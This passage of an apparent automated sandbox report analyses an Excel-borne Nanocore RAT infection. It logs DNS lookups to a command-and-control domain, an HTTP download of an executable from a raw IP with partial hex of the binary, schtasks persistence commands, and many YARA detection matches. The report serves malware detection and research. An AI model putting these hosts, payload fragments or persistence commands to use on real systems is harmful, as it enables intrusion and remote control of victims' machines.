              Sep 15, 2021 11:57:37.320537090 CEST4916580192.168.2.22136.144.41.96
              Sep 15, 2021 11:57:37.320538044 CEST8049165136.144.41.96192.168.2.22

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Sep 15, 2021 11:57:44.887912035 CEST5216753192.168.2.228.8.8.8
              Sep 15, 2021 11:57:44.918164015 CEST53521678.8.8.8192.168.2.22
              Sep 15, 2021 11:57:44.918648005 CEST5216753192.168.2.228.8.8.8
              Sep 15, 2021 11:57:44.952068090 CEST53521678.8.8.8192.168.2.22
              Sep 15, 2021 11:57:57.250497103 CEST5059153192.168.2.228.8.8.8
              Sep 15, 2021 11:57:57.279937029 CEST53505918.8.8.8192.168.2.22
              Sep 15, 2021 11:58:03.442548990 CEST5780553192.168.2.228.8.8.8
              Sep 15, 2021 11:58:03.470473051 CEST53578058.8.8.8192.168.2.22
              Sep 15, 2021 11:58:10.334753036 CEST5903053192.168.2.228.8.8.8
              Sep 15, 2021 11:58:10.363152027 CEST53590308.8.8.8192.168.2.22
              Sep 15, 2021 11:58:10.411839008 CEST5903053192.168.2.228.8.8.8
              Sep 15, 2021 11:58:10.439944029 CEST53590308.8.8.8192.168.2.22
              Sep 15, 2021 11:58:18.370033026 CEST5918553192.168.2.228.8.8.8
              Sep 15, 2021 11:58:18.396095037 CEST53591858.8.8.8192.168.2.22
              Sep 15, 2021 11:58:24.605493069 CEST5561653192.168.2.228.8.8.8
              Sep 15, 2021 11:58:24.631927967 CEST53556168.8.8.8192.168.2.22
              Sep 15, 2021 11:58:30.830264091 CEST4997253192.168.2.228.8.8.8
              Sep 15, 2021 11:58:30.859535933 CEST53499728.8.8.8192.168.2.22
              Sep 15, 2021 11:58:37.037288904 CEST5177153192.168.2.228.8.8.8
              Sep 15, 2021 11:58:37.074525118 CEST53517718.8.8.8192.168.2.22
              Sep 15, 2021 11:58:43.340106964 CEST5986753192.168.2.228.8.8.8
              Sep 15, 2021 11:58:43.374453068 CEST53598678.8.8.8192.168.2.22
              Sep 15, 2021 11:58:43.375463963 CEST5986753192.168.2.228.8.8.8
              Sep 15, 2021 11:58:43.400038958 CEST53598678.8.8.8192.168.2.22
              Sep 15, 2021 11:58:49.590432882 CEST5031553192.168.2.228.8.8.8
              Sep 15, 2021 11:58:49.620173931 CEST53503158.8.8.8192.168.2.22
              Sep 15, 2021 11:58:55.833739996 CEST5007253192.168.2.228.8.8.8
              Sep 15, 2021 11:58:55.863729954 CEST53500728.8.8.8192.168.2.22
              Sep 15, 2021 11:59:02.062530041 CEST5430453192.168.2.228.8.8.8
              Sep 15, 2021 11:59:02.091721058 CEST53543048.8.8.8192.168.2.22
              Sep 15, 2021 11:59:08.279654026 CEST4989453192.168.2.228.8.8.8
              Sep 15, 2021 11:59:08.311569929 CEST53498948.8.8.8192.168.2.22
              Sep 15, 2021 11:59:13.634454966 CEST6464553192.168.2.228.8.8.8
              Sep 15, 2021 11:59:13.662888050 CEST53646458.8.8.8192.168.2.22
              Sep 15, 2021 11:59:20.255594015 CEST5374553192.168.2.228.8.8.8
              Sep 15, 2021 11:59:20.299485922 CEST53537458.8.8.8192.168.2.22

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
              Sep 15, 2021 11:57:44.887912035 CEST192.168.2.228.8.8.80xa31Standard query (0)godisgood1.hopto.orgA (IP address)IN (0x0001)
              Sep 15, 2021 11:57:44.918648005 CEST192.168.2.228.8.8.80xa31Standard query (0)godisgood1.hopto.orgA (IP address)IN (0x0001)
              Sep 15, 2021 11:57:57.250497103 CEST192.168.2.228.8.8.80xe79cStandard query (0)godisgood1.hopto.orgA (IP address)IN (0x0001)
              Sep 15, 2021 11:58:03.442548990 CEST192.168.2.228.8.8.80x39b8Standard query (0)godisgood1.hopto.orgA (IP address)IN (0x0001)
              Sep 15, 2021 11:58:10.334753036 CEST192.168.2.228.8.8.80x764bStandard query (0)godisgood1.hopto.orgA (IP address)IN (0x0001)
              Sep 15, 2021 11:58:10.411839008 CEST192.168.2.228.8.8.80x764bStandard query (0)godisgood1.hopto.orgA (IP address)IN (0x0001)
              Sep 15, 2021 11:58:18.370033026 CEST192.168.2.228.8.8.80x60a5Standard query (0)godisgood1.hopto.orgA (IP address)IN (0x0001)
              Sep 15, 2021 11:58:24.605493069 CEST192.168.2.228.8.8.80x6509Standard query (0)godisgood1.hopto.orgA (IP address)IN (0x0001)
              Sep 15, 2021 11:58:30.830264091 CEST192.168.2.228.8.8.80xe5a9Standard query (0)godisgood1.hopto.orgA (IP address)IN (0x0001)
              Sep 15, 2021 11:58:37.037288904 CEST192.168.2.228.8.8.80xfa31Standard query (0)godisgood1.hopto.orgA (IP address)IN (0x0001)
              Sep 15, 2021 11:58:43.340106964 CEST192.168.2.228.8.8.80xa0c5Standard query (0)godisgood1.hopto.orgA (IP address)IN (0x0001)
              Sep 15, 2021 11:58:43.375463963 CEST192.168.2.228.8.8.80xa0c5Standard query (0)godisgood1.hopto.orgA (IP address)IN (0x0001)
              Sep 15, 2021 11:58:49.590432882 CEST192.168.2.228.8.8.80x613aStandard query (0)godisgood1.hopto.orgA (IP address)IN (0x0001)
              Sep 15, 2021 11:58:55.833739996 CEST192.168.2.228.8.8.80xa1aStandard query (0)godisgood1.hopto.orgA (IP address)IN (0x0001)
              Sep 15, 2021 11:59:02.062530041 CEST192.168.2.228.8.8.80xe885Standard query (0)godisgood1.hopto.orgA (IP address)IN (0x0001)
              Sep 15, 2021 11:59:08.279654026 CEST192.168.2.228.8.8.80x2b51Standard query (0)godisgood1.hopto.orgA (IP address)IN (0x0001)
              Sep 15, 2021 11:59:13.634454966 CEST192.168.2.228.8.8.80x26b5Standard query (0)godisgood1.hopto.orgA (IP address)IN (0x0001)
              Sep 15, 2021 11:59:20.255594015 CEST192.168.2.228.8.8.80xb5a5Standard query (0)godisgood1.hopto.orgA (IP address)IN (0x0001)

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
              Sep 15, 2021 11:57:44.918164015 CEST8.8.8.8192.168.2.220xa31No error (0)godisgood1.hopto.org103.147.184.84A (IP address)IN (0x0001)
              Sep 15, 2021 11:57:44.952068090 CEST8.8.8.8192.168.2.220xa31No error (0)godisgood1.hopto.org103.147.184.84A (IP address)IN (0x0001)
              Sep 15, 2021 11:57:57.279937029 CEST8.8.8.8192.168.2.220xe79cNo error (0)godisgood1.hopto.org103.147.184.84A (IP address)IN (0x0001)
              Sep 15, 2021 11:58:03.470473051 CEST8.8.8.8192.168.2.220x39b8No error (0)godisgood1.hopto.org103.147.184.84A (IP address)IN (0x0001)
              Sep 15, 2021 11:58:10.363152027 CEST8.8.8.8192.168.2.220x764bNo error (0)godisgood1.hopto.org103.147.184.84A (IP address)IN (0x0001)
              Sep 15, 2021 11:58:10.439944029 CEST8.8.8.8192.168.2.220x764bNo error (0)godisgood1.hopto.org103.147.184.84A (IP address)IN (0x0001)
              Sep 15, 2021 11:58:18.396095037 CEST8.8.8.8192.168.2.220x60a5No error (0)godisgood1.hopto.org103.147.184.84A (IP address)IN (0x0001)
              Sep 15, 2021 11:58:24.631927967 CEST8.8.8.8192.168.2.220x6509No error (0)godisgood1.hopto.org103.147.184.84A (IP address)IN (0x0001)
              Sep 15, 2021 11:58:30.859535933 CEST8.8.8.8192.168.2.220xe5a9No error (0)godisgood1.hopto.org103.147.184.84A (IP address)IN (0x0001)
              Sep 15, 2021 11:58:37.074525118 CEST8.8.8.8192.168.2.220xfa31No error (0)godisgood1.hopto.org103.147.184.84A (IP address)IN (0x0001)
              Sep 15, 2021 11:58:43.374453068 CEST8.8.8.8192.168.2.220xa0c5No error (0)godisgood1.hopto.org103.147.184.84A (IP address)IN (0x0001)
              Sep 15, 2021 11:58:43.400038958 CEST8.8.8.8192.168.2.220xa0c5No error (0)godisgood1.hopto.org103.147.184.84A (IP address)IN (0x0001)
              Sep 15, 2021 11:58:49.620173931 CEST8.8.8.8192.168.2.220x613aNo error (0)godisgood1.hopto.org103.147.184.84A (IP address)IN (0x0001)
              Sep 15, 2021 11:58:55.863729954 CEST8.8.8.8192.168.2.220xa1aNo error (0)godisgood1.hopto.org103.147.184.84A (IP address)IN (0x0001)
              Sep 15, 2021 11:59:02.091721058 CEST8.8.8.8192.168.2.220xe885No error (0)godisgood1.hopto.org103.147.184.84A (IP address)IN (0x0001)
              Sep 15, 2021 11:59:08.311569929 CEST8.8.8.8192.168.2.220x2b51No error (0)godisgood1.hopto.org103.147.184.84A (IP address)IN (0x0001)
              Sep 15, 2021 11:59:13.662888050 CEST8.8.8.8192.168.2.220x26b5No error (0)godisgood1.hopto.org103.147.184.84A (IP address)IN (0x0001)
              Sep 15, 2021 11:59:20.299485922 CEST8.8.8.8192.168.2.220xb5a5No error (0)godisgood1.hopto.org103.147.184.84A (IP address)IN (0x0001)

              HTTP Request Dependency Graph

              • 136.144.41.96

              HTTP Packets

              Session IDSource IPSource PortDestination IPDestination PortProcess
              0192.168.2.2249165136.144.41.9680C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
              TimestampkBytes transferredDirectionData
              Sep 15, 2021 11:57:37.131921053 CEST0OUTGET /HHK.exe HTTP/1.1
              Connection: Keep-Alive
              Host: 136.144.41.96
              Sep 15, 2021 11:57:37.183017969 CEST1INHTTP/1.1 200 OK
              Date: Wed, 15 Sep 2021 09:57:37 GMT
              Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.9
              Last-Modified: Wed, 15 Sep 2021 03:07:30 GMT
              ETag: "93400-5cbffffb6965c"
              Accept-Ranges: bytes
              Content-Length: 603136
              Keep-Alive: timeout=5, max=100
              Connection: Keep-Alive
              Content-Type: application/x-msdownload
              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 98 60 4b 8c 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 2a 09 00 00 08 00 00 00 00 00 00 ba 48 09 00 00 20 00 00 00 60 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 09 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 68 48 09 00 4f 00 00 00 00 60 09 00 bc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 09 00 0c 00 00 00 4c 48 09 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 28 09 00 00 20 00 00 00 2a 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 bc 05 00 00 00 60 09 00 00 06 00 00 00 2c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 09 00 00 02 00 00 00 32 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c 48 09 00 00 00 00 00 48 00 00 00 02 00 05 00 90 3f 00 00 c4 5e 01 00 03 00 00 00 6f 00 00 06 54 9e 01 00 f8 a9 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7e 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 2a b6 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 02 03 7d 02 00 00 04 02 04 7d 03 00 00 04 2a 00 00 13 30 02 00 4f 00 00 00 00 00 00 00 02 1f 24 7d 04 00 00 04 02 16 7d 07 00 00 04 02 16 7d 08 00 00 04 02 28 15 00 00 0a 00 00 02 03 7b 01 00 00 04 7d 01 00 00 04 02 03 7b 05 00 00 04 7d 05 00 00 04 02 03 7b 06 00 00 04 7d 06 00 00 04 02 03 7b 07 00 00 04 7d 07 00 00 04 2a 3a 00 02 7b 04 00 00 04 28 16 00 00 0a 00 2a 00 00 13 30 03 00 77 00 00 00 01 00 00 11 00 03 17 52 02 7b 01 00 00 04 0b 07 0a 06 2c 66 06 72 01 00 00 70 28 17 00 00 0a 2d 29 06 72 21 00 00 70 28 17 00 00 0a 2d 25 06 72 2d 00 00 70 28 17 00 00 0a 2d 25 06 72 39 00 00 70 28 17 00 00 0a 2d 25 2b 30 02 17 7d 08 00 00 04 2b 27 04 04 4a 02 7b 07 00 00 04 58 54 2b 1a 04 04 4a 02 7b 07 00 00 04 58 54 2b 0d 04 04 4a 02 7b 07 00 00 04 58 54 2b 00 2a 00 13 30 01 00 0b 00 00 00 02 00 00 11 00 72 45 00 00 70 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 02 00 00 11 00 72 6f 00 00 70 0a 2b 00 06 2a 00 13 30 01 00 0c 00 00 00 03 00 00 11 00 19 8d 10 00 00 01 0a 2b 00 06 2a 22 02 28 15 00 00 0a 00 2a 00 00 00 13 30 02 00 26 00 00 00 04 00 00 11 00
              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL`K0*H `@ @hHO`LH H.text( * `.rsrc`,@@.reloc2@BHH?^oT~$}}}(*$}}}(}}*0O$}}}({}{}{}{}*:{(*0wR{,frp(-)r!p(-%r-p(-%r9p(-%+0}+'J{XT+J{XT+J{XT+*0rEp+*0rop+*0+*"(*0&


              Code Manipulations

              Statistics

              Behavior

              Click to jump to process

              System Behavior

              Analysis Process: EXCEL.EXE PID: 2584 Parent PID: 596

              General

              Start time:11:56:28
              Start date:15/09/2021
              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              Wow64 process (32bit):false
              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
              Imagebase:0x13f8f0000
              File size:28253536 bytes
              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:moderate

              Analysis Process: EQNEDT32.EXE PID: 832 Parent PID: 596

              General

              Start time:11:56:47
              Start date:15/09/2021
              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
              Wow64 process (32bit):true
              Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
              Imagebase:0x400000
              File size:543304 bytes
              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Analysis Process: ALP.exe PID: 1272 Parent PID: 832

              General

              Start time:11:56:49
              Start date:15/09/2021
              Path:C:\Users\user\AppData\Roaming\ALP.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Roaming\ALP.exe
              Imagebase:0x910000
              File size:603136 bytes
              MD5 hash:60E9F1E8596C98A6B07129D9C24EC359
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000003.00000002.477879710.000000000249D000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.479035033.0000000003469000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.479035033.0000000003469000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.479035033.0000000003469000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Antivirus matches:
              • Detection: 100%, Joe Sandbox ML
              • Detection: 30%, ReversingLabs
              Reputation:low

              Analysis Process: ALP.exe PID: 1212 Parent PID: 1272

              General

              Start time:11:56:51
              Start date:15/09/2021
              Path:C:\Users\user\AppData\Roaming\ALP.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Roaming\ALP.exe
              Imagebase:0x910000
              File size:603136 bytes
              MD5 hash:60E9F1E8596C98A6B07129D9C24EC359
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.691493356.00000000021B0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.691493356.00000000021B0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.691041233.00000000008A0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.691041233.00000000008A0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.690682289.00000000006C0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.690682289.00000000006C0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.690682289.00000000006C0000.00000004.00020000.sdmp, Author: Joe Security
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.690880215.0000000000780000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.690880215.0000000000780000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.690912627.0000000000790000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.690912627.0000000000790000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.691516728.00000000021D0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.691516728.00000000021D0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.690948278.00000000007C0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.690948278.00000000007C0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.690383308.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.690383308.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.690383308.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.694158728.0000000003479000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.694158728.0000000003479000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.690432511.0000000000470000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.690432511.0000000000470000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.690979593.0000000000820000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.690979593.0000000000820000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.694476042.00000000036F7000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.691050468.00000000008B0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.691050468.00000000008B0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.691024483.0000000000850000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.691024483.0000000000850000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.691059827.00000000008C0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.691059827.00000000008C0000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.691013967.0000000000840000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.691013967.0000000000840000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.691571948.0000000002300000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.691571948.0000000002300000.00000004.00020000.sdmp, Author: Florian Roth
              • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.691649725.0000000002482000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.691609233.0000000002431000.00000004.00000001.sdmp, Author: Joe Security
              Reputation:low

              Analysis Process: schtasks.exe PID: 2212 Parent PID: 1212

              General

              Start time:11:56:52
              Start date:15/09/2021
              Path:C:\Windows\SysWOW64\schtasks.exe
              Wow64 process (32bit):true
              Commandline:'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp3811.tmp'
              Imagebase:0xd30000
              File size:179712 bytes
              MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Analysis Process: schtasks.exe PID: 2596 Parent PID: 1212

              General

              Start time:11:56:54
              Start date:15/09/2021
              Path:C:\Windows\SysWOW64\schtasks.exe
              Wow64 process (32bit):true
              Commandline:'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp277F.tmp'
              Imagebase:0x860000
              File size:179712 bytes
              MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Analysis Process: taskeng.exe PID: 2612 Parent PID: 896

              General

              Start time:11:56:55
              Start date:15/09/2021
              Path:C:\Windows\System32\taskeng.exe
              Wow64 process (32bit):false
              Commandline:taskeng.exe {6D7D75E4-8EFD-44BB-96AC-FEA7E6E0852F} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
              Imagebase:0xffdd0000
              File size:464384 bytes
              MD5 hash:65EA57712340C09B1B0C427B4848AE05
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Analysis Process: ALP.exe PID: 2608 Parent PID: 2612

              General

              Start time:11:56:56
              Start date:15/09/2021
              Path:C:\Users\user\AppData\Roaming\ALP.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Roaming\ALP.exe 0
              Imagebase:0x910000
              File size:603136 bytes
              MD5 hash:60E9F1E8596C98A6B07129D9C24EC359
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.511286759.0000000003289000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.511286759.0000000003289000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.511286759.0000000003289000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000A.00000002.510442930.00000000022BD000.00000004.00000001.sdmp, Author: Joe Security
              Reputation:low

              Analysis Process: smtpsvc.exe PID: 2668 Parent PID: 2612

              General

              Start time:11:56:56
              Start date:15/09/2021
              Path:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
              Wow64 process (32bit):true
              Commandline:'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
              Imagebase:0xbe0000
              File size:603136 bytes
              MD5 hash:60E9F1E8596C98A6B07129D9C24EC359
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000B.00000002.512977056.00000000022DD000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000002.513705045.00000000032A9000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000002.513705045.00000000032A9000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000B.00000002.513705045.00000000032A9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Antivirus matches:
              • Detection: 100%, Joe Sandbox ML
              • Detection: 30%, ReversingLabs
              Reputation:low

              Analysis Process: smtpsvc.exe PID: 2796 Parent PID: 1764

              General

              Start time:11:57:02
              Start date:15/09/2021
              Path:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
              Wow64 process (32bit):true
              Commandline:'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
              Imagebase:0xbe0000
              File size:603136 bytes
              MD5 hash:60E9F1E8596C98A6B07129D9C24EC359
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000C.00000002.515854316.000000000223D000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.516689891.0000000003209000.00000004.00000001.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.516689891.0000000003209000.00000004.00000001.sdmp, Author: Joe Security
              • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.516689891.0000000003209000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
              Reputation:low

              Analysis Process: smtpsvc.exe PID: 1412 Parent PID: 2668

              General

              Start time:11:57:05
              Start date:15/09/2021
              Path:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
              Wow64 process (32bit):false
              Commandline:C:\Program Files (x86)\SMTP Service\smtpsvc.exe
              Imagebase:0xbe0000
              File size:603136 bytes
              MD5 hash:60E9F1E8596C98A6B07129D9C24EC359
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low

              Analysis Process: ALP.exe PID: 2700 Parent PID: 2608

              General

              Start time:11:57:05
              Start date:15/09/2021
              Path:C:\Users\user\AppData\Roaming\ALP.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Roaming\ALP.exe
              Imagebase:0x910000
              File size:603136 bytes
              MD5 hash:60E9F1E8596C98A6B07129D9C24EC359
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
